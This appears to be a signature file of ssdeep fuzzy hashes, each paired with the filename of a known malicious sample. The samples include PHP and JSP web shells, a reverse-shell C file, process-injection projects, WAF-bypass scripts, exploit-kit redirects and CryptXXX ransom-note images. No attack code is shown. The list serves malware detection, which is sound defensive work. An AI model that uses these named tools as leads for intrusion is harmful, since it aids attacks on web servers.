+12:S7+cbTBKlTZhBQfpOiqGx6uRtEndWTRckPHPKL:GETIftqsPUecpL,"americanwineclub.se.js"
+12:rF2B92ClgANMBnoZlJvZXxLN17IZUZbQkdH1QR3xL:n+g9slJ9Oyn11M,"Ru24PostWebShell_by_DreAmeRz.php.txt"
+12:rF2B92ClgANMBnoZlJvZXxLN17IZUZbQkdH1QR3xb:n+g9slJ9Oyn11u,"ru24_post_sh.txt.001"
+12:RAqVAE/AGRpUA83GMHnmo/PyAFBhiDECPlounw:RrBhAALMX/+QCuunw,"Reverse Shell.c"
+12:R3ErLCGz3MEjDMWyxqJUQbGctTE+OGpadu5GpN2CwL:KrLCGzLjm8Tb1zhpaAkpNlwL,"7ba2de44f61739df7d707e07803b6284_php.txt"
+12:qtAYKuIv5IU4DBIlLskgOOCMqKsfvm5QO1QEZCZouRwObfAcN6GDK/KR1mh2gJuu:qyc8X4Np3GSUhRJfSUWKRHgId4,"1148d726e3bdec6db65db30c08a75f80.php"
+12:qPE7RkI7JjsFK8LK2KKosHRrG3DGU6Rrjtx6HJtFIgA6yGgi8GhuCV:qPEWItjsKsK2KHJ46Re6x8+,"ExeToInjectInTo.sln"
+12:qPE7RkI7JjmPVHz6PVsVLT0RrGI6kDG4a6RrHx6HNFEnHKzMVhEA6yaEi8Gaby4u:qPEWItjmdHGdsHzI6+6TEqoVD6/8BJ8T,"DemoDLL_RemoteProcess.sln"
+12:qOuKu2uLus3WBTpRHrwn1mmT9zMATfEL0zVQ/JEuDqduupwV3KyZ9nIPwcpf18yK:CGBTDLAmmT9zTML0aXqdut3K8nI4cpmF,"Silic.jsp"
+12:qOuKu2uLus3WBTpRHrwn1mmT9zMATfEL0zVQ/JEuDqduupwV3KyZ9nIPwcpf18y0:CGBTDLAmmT9zTML0aXqdut3K8nI4cpmV,"hsxa1.jsp"
+12:qnzYKuIv5KoU4DBI+gogOOCMqKvffQJ1QEgCg3uRfJbfPclCED9E7KR9YDmZElgr:qnzc8kN4NZgL2VHzRpfG+7KRWbgId4,"toby57解析加密一句话木马.php"
+12:QMleKl1maQloNmloNmaVlo9aFaVlo9aVaVlooYQl1maFaoooooYvoooooooooo9W:QMEPi,"2016-06-21-pseudoDarkleech-CryptXXX-decrypt-instructions.bmp"
+12:QMleKl1maQloNmloNmaVlo9aFaVlo9aVaVlooYQl1maFaoooooYvoooooooooo9+:QMEMgI7wgbAov,"2016-06-21-Afraidgate-CryptXXX-decrypt-instructions.bmp"
+12:+Qmbhca+2Soz/Dwcdk739nyOhkkRtgl4w+dLEPVpfG51s:+riLoz/DBd838e3Rti+1IG51s,"redirect7.php"
+12:qJIIxAwgdpb6y509Ow3ZsAQmzWLtERpOchGWyfKOb:II1rdpb6y509Owps6yqRkchojb,"PHP简单小马源码.php"
+12:qGXoxLWCU8lS+6e3cCcS4cx0U+W4Xg1Bwugdne2m1mTjj:qRWCUeSru4cwuceHmL,"jembot.php"
+12:QcyFAcep6SBLOh/Qizkp4dcGTyUwUhOkHxlrxqTbVO0YMxVXk1j/etnEw2sG4jgS:QG1o2ah1QiyUVOkHxHqTbVdzZn3TgwTV,"alert.py"
+12:QcyFAcep6SBLOh/Qizkp4dcGTyUwUhOkHxlrxqTbVO0YMxVXk1j/etnE/B2sG4ps:QG1o2ah1QiyUVOkHxHqTbVdzZneZs,"null.py"
+12:QcyFAcep6SBLOh/Qizkp4dcGTyUwUhOkHxlrxqTbVO0YMFEcr1AtsVQe:QG1o2ah1QiyUVOkHxHqTbV7FFAtu,"exceptions.py"
+12:QcyFAcep6SBLOh/Qizkp4dcGTyUwUhOkHxlrxqTbVO0YDXxv9BL20jWXfL2n:QG1o2ah1QiyUVOkHxHqTbVaXDIq,"_ordereddict.py"
+12:QcyFAcep6SBLOh/Qizkp4dcGTyUwUhOkHxlrxqTbVO0YCyGxVXk1j/etnESf2sGn:QG1o2ah1QiyUVOkHxHqTbVjjzZnxFKL,"print.py"
+12:QcyFAcep6SBLOh/Qizkp4dcGTyUwUhOkHxlrxqTbVO0Y5fMYTJFK8y5MzE12zn0f:QG1o2ah1QiyUVOkHxHqTbVFHBSit9,"log.py"
+12:PjuGB/A1l8tF+WDjGkWwEYNx7JAgZdMqGl:LvB/A1m+ajGkWN27JAyS,"cmd.test.drivull.txt.1"
+12:PjuGB/A1e5KOWDjGkWwEYNx7JAgZdMqGl:LvB/A1EajGkWN27JAyS,"test.drivull.txt.001"
+12:PfAgrNY6p6+7AFlJ6TvGUwGvpa6JJUVfaQrc2KEk:PfA2NYZeAUvG5GxxJUaQwl,"upload.php.1454814285_1"
+12:P7L4qxNxw5M6GE+vG2pH5MbQfFwOFeTg37Drm7DL7Dh27DL7DEk/djtOggJ9n:P7NNO5M6GtvG2LMbWFjeTgLHST0TAk/8,"random-oct5-2016.php"
+12:P7L4qxNxw5M6GE+vG2pH5MbQfFwOFeTg37Drm7DL7Dh27DL7DEk/d1OggJ9n:P7NNO5M6GtvG2LMbWFjeTgLHST0TAk/s,"rand-oct5-2016.php"
+12:OZ+MXeJAwCrsS84RKGjE01FDzA8OGkZz3JGkPZZcljYsAcnjPn:OZzxh8iXE01lAukZzUkPZmljYxczn,"w.php"
+12:OwBe30Zk6x/9NQsTMHUAgBlY+YqZxcw7BO6JZLA9ZhXV:Ow9k6x/9N/TM0AG6+YAa0BJTgT,"redirect11.php"
+12:OvYSBT8GC+l2KIZ5zufJ5Q3ATKaJxN7dcQHR5Bg3BQ0:OQzDKI2fn3+SzR5B060,"mod_cgi.shell.bind.htaccess"
+12:OTSJx9nyA9/ccPzWnddWDjpmkWwEYNx7JAgSP1Uu:HLJRzCn/ajMkWN27JA71Uu,"img.txt.001"
+12:Opfnvjew7RT0+1XPFLSBerlFjy5kZSOiP:q/vCCT0+1f2epFjy5kYHP,"pb.jsp"
+12:/ooYIV1aVadV1aVaAaVl9agaVl9awooItiNvaooooYfooooooIttoo9a9VNeagai:l,"2016-07-25-pseudoDarkleech-CryptXXX-decrypt-instructions.BMP"
+12:OMP//StH6+0aNX4v5LsJvVH3FcfE3cTvEESAvFqTL5hwTeuATL5W4iY2n3gTlvWC:OAHS56WXTFTMTvfSWFqJhwClqYvBT,"bypass-waf-2015-06-16-01.php"
+12:OlBFgBOcP6V7iHfP+fIcYHoK4VvXnXiFoLcN6NBj:Od4OJV7gXZd4VviF7S,"bypass-waf-2015-06-16-03.php"
+12:nvHeFIa4Qa9a4QaYI+aI+HHlo9atloooNF9aoooooooNHlt3aXgloooNF9HeF1lY:N,"2016-06-28-pseudoDarkleech-CryptXXX-decrypt-instructions.bmp"
+12:nvHeFIa4Qa9a4QaYI+aI+HHlo9atloooNF9aoooooooNHlt3aXgloooNF9HeF1lw:F,"2016-06-17-pseudoDarkleech-CryptXXX-decrypt-instructions.bmp"
+12:nvHeFIa4Qa9a4QaYI+aI+HHlo9atloooNF9aoooooooNHlt3aXgloooNF9HeF1lo:N,"2016-06-23-CryptXXX-decrypt-instructions.bmp"
+12:nvHeFIa4Qa9a4QaYI+aI+HHlo9atloooNF9aoooooooNHlt3aXgloooNF9HeF1lM:p,"2016-06-30-EITest-CryptXXX-decrypt-instructions.bmp"
+12:nvHeFIa4Qa9a4QaYI+aI+HHlo9atloooNF9aoooooooNHlt3aXgloooNF9HeF1lE:Z,"2016-07-19-pseudoDarkleech-CryptXXX-decrypt-instructions.BMP"
+12:nvHeFIa4Qa9a4QaYI+aI+HHlo9atloooNF9aoooooooNHlt3aXgloooNF9HeF1lc:C6,"2016-07-19-EITest-CryptXXX-decrypt-instructions.BMP"
+12:nvHeFIa4Qa9a4QaYI+aI+HHlo9atloooNF9aoooooooNHlt3aXgloooNF9HeF1lA:yra,"2016-07-01-pseudoDarkleech-CryptXXX-decrypt-instructions.bmp"
+12:N+qvzH0L6hqfCNySoROpGF5FH3lzOo3DRWGcmihDRWv0tmtmYZEo1lWdUTF1M5Et:NJv70LQqEySQFXlqERWHvRW6YnWdUTw8,"check.js"
+12:nm+itmaNawmaNaH4eav4eaI+lVeFdNQ+looPHoooooooVeO+lteaImaol+looPIo:wGnfHHv/XJ,"2016-06-10-pseudoDarkleech-CryptXXX-decrypt-instructions.bmp"
+12:nm+itmaNawmaNaH4eav4eaI+lVeFdNQ+looPHoooooooVeO+lteaImaol+looPIK:1,"2016-07-08-EITest-CryptXXX-decrypt-instructions.BMP"
+12:nm+itmaNawmaNaH4eav4eaI+lVeFdNQ+looPHoooooooVeO+lteaImaol+looPIi:d,"2016-07-11-Afraidgate-CryptXXX-decrypt-instructions.BMP"
+12:nm+itmaNawmaNaH4eav4eaI+lVeFdNQ+looPHoooooooVeO+lteaImaol+looPIb:HY,"2016-07-08-pseudoDarkleech-CryptXXX-decrypt-instructions.BMP"
+12:nm+itmaNawmaNaH4eav4eaI+lVeFdNQ+looPHoooooooVeO+lteaImaol+looPIa:GHa,"2016-06-21-EITest-CryptXXX-decrypt-instructions.bmp"
+12:nm+itmaNawmaNaH4eav4eaI+lVeFdNQ+looPHoooooooVeO+lteaImaol+looPI3:Y,"2016-06-20-decrypt-instructions-for-all-CryptXXX-samples.bmp"
+12:mYFAYj72xVW2XjNuLZZIcsIdwfOuZPdx6gLqNxYv:mY2VW2XjM93zufnzpLIxYv,"weevely-1.1-ref-qazwsxedc-2-dec.php"
+12:mV5X2rJTXAWmYvt1E5+5voecCgeWyplLWCvsNc/RAG2SofFIKxykOpAkhFD5is6y:mD2hpm61/Rz7b1OHSN9pAo3h60cu3CW,"Phpspy 2010 身份验证绕过漏洞"
+12:mPnGdyBoAQYRsrye/j5rznKTzlx9som1nud/PHsPwK4VdWZyzHymHkPMn:mPGcTRsrL/VrznKTm+d/7VdZLNR,"list.sh"
+12:MMHdNLm7pRGmaVV4YrHBdgnjrkyFGPLynnTlyWcomanqLRAqlBKkV:JdNCVRGma/zrhynsQs5omaq9lR,"mod_imagestyle.xml"
+12:Lz0vcaeCvevL66AIVDNVWQqJmUuQz9RbWLqyxBVY7:UEeZ4DNV8xLiBV0,"bootstrap2.java"
+12:LViVjcmiuwFtPBGOWZvX4WFSd3ghTnuAlNvV8kAAnzbRU28V2/eNwKW86fZxZtJa:LViVjB4gphXfSd34qUNvV3bRUDWxZxha,"2016-08-03-Magnitude-EK-flash-redirect.swf"
+12:LjcmiuwFtPBGOWZvX4WFSd3ghTnuAlNvVLhcU9EicVOP749Z43eNMDf5d1SsnTiC:LjB4gphXfSd34qUNvVFcmEic4O43kKQi,"2016-07-29-Magnitude-EK-flash-redirect-first-run.swf"
+12:LDRWm7R5pVTby9dpXu/HLun3ty9+J5QAW0Fwiv5MwEqODRWm7XU:3RWmVtgdp+/run3tgujMiR3ORWmw,"inframe1.php"
+12:KxZKRADAuGvW9mapuEzPNjYmEjJoUkzqp+yG7psEMPdRuG7NFiv3:4sUPuEzPZwCfzqp+TBWdJg3,"ob50.txt"
+12:ktTKu8cUePlhu8cUSF4lhu8cUzrMDDvG6+KkXegC9HPtXipvyZ6u1eV+zLyFXJ:Njgl5jhl5jUDDlkXwPtXMoo+iFZ,"s1.php"
+12:Kl8NzWQiJkP9TN/9AZmmtUc2S2YIY0S05DuRigso6mF00dgDbOdrk8d0OMni2GVG:Kl8gQi6P95/irt5zzj05qR7ob+gDbcYN,"gif.php"
+12:KIWVmAUnVgqhOvSLA1wFdZyUEuU3fesPlI2iI20h4QwaClco2ahk8ClcpQ4fha:mmAU3h2J9UUmM9iI2M8aKc8hk8KcptfU,"separator.php"
+12:KITUbCw3MdhOoWyK1Wyy7NQo8OD+Z4lGTYOhG9lGTYChq:MkdhNgCdmYOhG9mYChq,"base64.php"
+12:KITU9CV/dhOoWyGQ/uqWdIDwlzCv0a2KalWfDQEKzdJsGwalGRhvn:MwdhNGxSkKalSQEgiVaAhvn,"remove.php"
+12:KITU9CgqhOGA2IozvGAB9OoWyGQ/uqWdkCv0aZwF4aWInwaClWmqsVv+u/fhk:MhqhZDIZYGx6F4agaKtqsVv//fhk,"sufpre.php"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ZzZ030q03ypsKWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLTzapsKWFgGQFxR95CI,"idsuper.txt.283"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3zSu3o439eN9WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLE73WFgGQFxR95CI,"idsuper.txt.124"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3zd0cYI4W3DVbt32QpWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVL30cfzpWFgGQFxR95CI,"idsuper.txt.5"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3z1u5359Q31olhWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLHGWFgGQFxR95CI,"idsuper.txt.005"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yxR3J+t3Nt809WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVL4N+NWFgGQFxR95CI,"idsuper.txt.20.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yXDvRr3/jkVW3yi9BWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVL4uV0BWFgGQFxR95CI,"idsuper.txt.265"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yXd6R03KjTBR3HehWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVL4MJVuWFgGQFxR95CI,"idsuper.txt.276"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ysYLt3MqQ31HKWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVL4VLGBqWFgGQFxR95CI,"idsuper.txt.107"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yqNt318v3vGkGVoKWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLXR8cWFgGQFxR95CI,"idsuper.txt.152"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yQdL3EGo3yDWREbWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVL4QdhfbWFgGQFxR95CI,"idsuper.txt.34.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yKEf4R03tkW3+wHWLWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVL4Khz8AWFgGQFxR95CI,"idsuper.txt.14"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yK0Bq3R1c3GEWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL4AEWFgGQFxR95CI,"idsuper.txt.203"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yJ4sH3oxld3apWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVL4CxlwpWFgGQFxR95CI,"idsuper.txt.46"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3yECW39XfqZ3gJ7WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVL4kXpJWFgGQFxR95CI,"idsuper.txt.105"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3y8SkFHt3UXV6PA0310zX+M9WcCOkgGQlTJB+E:k3iymIsYv5WuVL49T5OKWFgGQFxR95CI,"idsuper.txt.1.010"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3xZ03nyc3KTrAhWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLhZTQhWFgGQFxR95CI,"idsuper.txt.184"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3xXDfYh3u3RE8WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL/fYi9WFgGQFxR95CI,"idsuper.txt.070"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3XX3TW03H03v3GVYWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVL56XCYWFgGQFxR95CI,"idsuper.txt.090"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3xUCV3lelF3FRVUR3WcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLAC2PkWFgGQFxR95CI,"idsuper.txt.24"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3XiWFH90326QdFs3mUWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLvFdBDUWFgGQFxR95CI,"idsuper.txt.35"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3xGht3Tk03HAmWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLTEkVmWFgGQFxR95CI,"idsuper.txt.237"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3X32LzKW3UqWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLEujqWFgGQFxR95CI,"idsuper.txt.1.006"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3X0DP3z3DjBn3PWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLcWFgGQFxR95CI,"idsuper.txt.079"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3WYN3KRvlW3uWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLQj3RWFgGQFxR95CI,"idsuper.txt.210"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3wV3035w0Z3P5lTWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLatmHZWFgGQFxR95CI,"idsuper.txt.266"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3wQOfOW3ZNV3D/9WcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLex7WFgGQFxR95CI,"idsuper.txt.27"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3WoYwU3QxAJk3oZVMfWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLs/VMfWFgGQFxR95CI,"idsuper.txt.29.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3wkS03jEO3pcSdzpWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLz4S9pWFgGQFxR95CI,"idsuper.txt.27.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3w6nbc7q3o1Xt3y7axWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLSHhAWxWFgGQFxR95CI,"idsuper.txt.145"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Vv3FQhk03bWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLntQDWFgGQFxR95CI,"idsuper.txt.144"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3VUT32wvstk3m4M9WcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLkEJ4M9WFgGQFxR95CI,"idsuper.txt.270"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3VR03RQJMlR03T0AWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLiPAWFgGQFxR95CI,"idsuper.txt.130"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3vq3yW+sQ3rpWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLBHdVpWFgGQFxR95CI,"idsuper.txt.14.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3vp33l03g0fWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLpV4fWFgGQFxR95CI,"idsuper.txt.100"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3VMe12N3A5035fNWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLv5QwCWFgGQFxR95CI,"idsuper.txt.166"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3vhW03in3l2NWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLy4WFgGQFxR95CI,"idsuper.txt.215"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3V/gUe903hi322wpWcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLj/RNpWFgGQFxR95CI,"idsuper.txt.154"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3vg03npt3EAYsKWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLpx+hWFgGQFxR95CI,"idsuper.txt.279"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Vb3y+EW3mWaWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLX2+6WaWFgGQFxR95CI,"idsuper.txt.26"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3vaOuzR03yPCtQ3ANxnlWcCOkgGQlTJB+kikFZ:k3iymIsYv5WuVLFUpmjlWFgGQFxR95CI,"idsuper.txt.10.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3V3t3h7V3IUlWRWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLb7HlWRWFgGQFxR95CI,"idsuper.txt.232"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3uqgF3oP6p03MjWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLcTA6PWFgGQFxR95CI,"idsuper.txt.167"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3uHiH5xEHN3M3HsF8WcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLcHVzF8WFgGQFxR95CI,"idsuper.txt.1.004"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3TVuwRc030oMQ3gELBWcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLw6MilWFgGQFxR95CI,"idsuper.txt.208"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3tTu36aO30lZa8WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLDMK8WFgGQFxR95CI,"idsuper.txt.131"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ttDtW3xM3t9WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLBDtjWFgGQFxR95CI,"idsuper.txt.123"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3tsUH3hc3yWyWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL3hPWFgGQFxR95CI,"idsuper.txt.111"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3tqSu3XE6z3HEWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL7qSDWFgGQFxR95CI,"idsuper.txt.146"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Tk3mzNrO3+RS3WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLFzNrw3WFgGQFxR95CI,"idsuper.txt.023"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3TH2t3q13IcWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLRH2QmcWFgGQFxR95CI,"idsuper.txt.141"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3TDDX3Wv3sAURIWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLd1nRIWFgGQFxR95CI,"idsuper.txt.269"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3t3kPZ3vs/THH0hWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLaVsWWFgGQFxR95CI,"idsuper.txt.010"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3sw6AQv3fy31cBCAhWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVL6AjShWFgGQFxR95CI,"idsuper.txt.1.009"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3SJ3aDyE3OdqVrWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLjD4qVrWFgGQFxR95CI,"idsuper.txt.239"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3s/EoN3lk3XBWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLq/EhWFgGQFxR95CI,"idsuper.txt.024"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3rZQ3wWp3cbP59WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLDPWE9WFgGQFxR95CI,"idsuper.txt.089"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3rVdhn3FZy3CcphWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLnZ/c7WFgGQFxR95CI,"idsuper.txt.170"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3RQk53DdKD3qTJWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLjtjJWFgGQFxR95CI,"idsuper.txt.043"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3RQbeDe03iQ3cSdWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVL4eDYeWFgGQFxR95CI,"idsuper.txt.155"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3RNkRZK3vFQ3wRvWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVLpYuRWFgGQFxR95CI,"idsuper.txt.065"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Rl9p3Wp3ft8WcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLE8WFgGQFxR95CI,"idsuper.txt"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Rk3GfUZ3tIhWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLVfrWFgGQFxR95CI,"idsuper.txt.1.013"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3rH39o3+nNWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLNrWFgGQFxR95CI,"idsuper.txt.017"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3r4R032Lm23NYC70WcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLOT0WFgGQFxR95CI,"idsuper.txt.101"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3R3CV3TYSWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL6WFgGQFxR95CI,"idsuper.txt.271"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3QXJ3A0UH3K8D6WcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVL4O0Ua1WFgGQFxR95CI,"idsuper.txt.137"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3qo3WYP3pKBhWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLA/YmWFgGQFxR95CI,"idsuper.txt.183"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3QH2K3tMZ03jVANUpWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLhEXQUpWFgGQFxR95CI,"idsuper.txt.046"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Q6bO3zvPx03FyWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLSbPxWyWFgGQFxR95CI,"idsuper.txt.104"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3q03bVRe3jfjWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLx6jWFgGQFxR95CI,"idsuper.txt.066"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3pVSwNq3yy6YlW3ug+WcCOkgGQlTJB+kikFPG0:k3iymIsYv5WuVLrwKL+WFgGQFxR95CI,"idsuper.txt.035"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3Pmm3Meg1G3IBWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLkxlBWFgGQFxR95CI,"idsuper.txt.23"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3pJ803BxsW3sQeWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLlDmz9WFgGQFxR95CI,"idsuper.txt.22"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3peciMH3ZVSO3NO6WcCOkgGQlTJB+kikFPG/IH:k3iymIsYv5WuVLmYVSp6WFgGQFxR95CI,"idsuper.txt.013"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3PBG3I3W8qpWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVL9LqpWFgGQFxR95CI,"idsuper.txt.8.001"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3p5W03p3MNjpWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLXsfN1WFgGQFxR95CI,"idsuper.txt.9"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3oW93+d3b9V2WWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLdwrWFgGQFxR95CI,"idsuper.txt.085"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ow329BUSb3+fpWcCOkgGQlTJB+kikFPG/IAqZ:k3iymIsYv5WuVLepiBWFgGQFxR95CI,"idsuper.txt.122"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3oRaPR03QC3yLVLWcCOkgGQlTJB+kikFPG/IAa:k3iymIsYv5WuVL+RqpWFgGQFxR95CI,"idsuper.txt.48"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ONjBWR031mL31QwKWcCOkgGQlTJB+kikFPG/M:k3iymIsYv5WuVLkgWmSWFgGQFxR95CI,"idsuper.txt.034"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3ogM4rR03xOVC32RaAhWcCOkgGQlTJB+kikFPR:k3iymIsYv5WuVLXMG3hhWFgGQFxR95CI,"idsuper.txt.180"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3O+G43aFhF3ahWcCOkgGQlTJB+kikFPG/IAq8I:k3iymIsYv5WuVLoHh8WFgGQFxR95CI,"idsuper.txt.057"
+12:kIqJmWOv6mIDQYvdrWwXVZQ34l3oCRJN3BKxxQ6c3SJlJIWcCOkgGQlTJB+kikFZ:k3iymIsYv5WuVLkFPaWFgGQFxR95CI,"idsuper.txt.217"
